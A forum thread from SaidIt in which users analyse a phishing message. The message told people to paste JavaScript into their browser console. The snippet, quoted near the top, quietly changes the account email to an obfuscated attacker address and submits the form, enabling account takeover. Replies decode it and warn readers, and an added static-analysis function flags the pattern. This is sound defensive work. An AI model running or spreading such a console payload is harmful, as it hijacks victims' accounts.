[–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (12 children)

Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.

What does this do? (broken into 4 smaller chunks rather than one long line):

Paste this: d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";
Hit enter. You've just kicked the hacker out of your account!

[–][deleted]  (4 children)

[removed]

    [–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (3 children)

    No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.

    Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

    because the attacker assumed the form uses POST, which it doesn't

    It might be POST compatible. Once upon a time young lady, there was no javascript.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I tried it by substituting their email for one of my own, and it didn't work.

    [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

    It's a dude bro. A dude who roleplays having a female penis.

    [–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (0 children)

    It's JavaScript code. Do not run it!

    'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '') returns woridi5084@0pppp.com. That's the attacker's email address — looks like a scam address to me. They probably obfuscated it so they wouldn't get reported to their email provider, and so you wouldn't immediately recognize it as an email address.

    d.getElementsByName('email')[0].value sets your email address to the email above, but doesn't actually change it.

    d.getElementsByTagName('form')[1].submit() submits the form to change your email. I don't think that actually works, BTW, so if you did run the code: you're probably safe. (But still make sure your email hasn't been changed!) That page didn't use POST when I set my email address, so I think it just uses JavaScript.

    location.href="https://www.saidit.net/"; Just redirects you to the home page.

    Even if the code did work: this is a terrible way to hack into someone's account, since I don't know anyone who would actually paste a block of code into their console... you'd have to be a literal rock to fall for it.

    But if y'all get so'm like this again: send me the code and I'll figure out what it does no matter how hard they try to obfuscate it.
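
The manual decoding in the comment above, done as a static check that handles the pasted text as a string and never runs it. This is an added example, not code from the thread or from SaidIt; `resolveReplaceAll` and `triage` are names chosen here, and the sample is the snippet quoted at the top of this thread.

```javascript
// Added example: triage a pasted console snippet as inert text. Nothing is evaluated.

// Resolve 'literal'.replaceAll('a', 'b') when all three arguments are plain
// string literals, tolerating the line breaks used to chunk the paste.
function resolveReplaceAll(src) {
  const lit = n => `(['"])((?:(?!\\${n}).)*)\\${n}`;
  const re = new RegExp(
    `${lit(1)}\\s*\\.\\s*replaceAll\\s*\\(\\s*${lit(3)}\\s*,\\s*${lit(5)}\\s*\\)`, 'g');
  // split/join mirrors replaceAll with a string pattern (literal, not regex).
  return [...src.matchAll(re)].map(m => m[2].split(m[4]).join(m[6]));
}

// Report what the snippet would do to an account-settings page.
function triage(src) {
  const flat = src.replace(/\s+/g, '');   // rejoin tokens split across lines
  const decoded = resolveReplaceAll(src);
  const report = {
    decoded,
    // Decoded strings that turn out to be e-mail addresses.
    hiddenEmails: decoded.filter(s => /^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(s)),
    // Writes into the input named "email".
    setsEmailField: /getElementsByName\(['"]email['"]\)\[\d+\]\.value=(?!=)/.test(flat),
    // Submits a form from script.
    submitsForm: /\.submit\(\)/.test(flat),
    // Navigates away afterwards, hiding the settings page.
    redirects: /location(?:\.href)?=(?!=)/.test(flat),
  };
  report.verdict = report.setsEmailField && report.submitsForm
    ? 'changes account email and submits: do not paste'
    : 'no email-change pattern matched (not proof the snippet is safe)';
  return report;
}

// The snippet quoted at the top of this thread, kept as a string.
const SAMPLE = `d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";`;

console.log(triage(SAMPLE));
```

Only the `replaceAll` trick seen in this thread is decoded; other encodings would need their own resolver.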

    [–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (5 children)

    Please simply remove the code you pasted, in case anyone tries. I hope you haven't done what it says. If you have: please change your password ASAP.

    [–]JasonCarswell[S] 3 insightful - 3 fun3 insightful - 2 fun4 insightful - 3 fun -  (0 children)

    Removed from the OP, but I left it, broken, above for analysis.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (3 children)

    And make sure your email address hasn't been changed u/JasonCarswell.

    [–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

    I didn't plug it in. The whole thing seemed beyond fishy. My reason for immediately shouting it out was to warn people. Plus I wondered if it had come up before to others.

    [–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I got a message as well. It must have gone out to most of saidit.

    [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

    Great! I don't think anyone would actually fall for it, though (even if the code worked).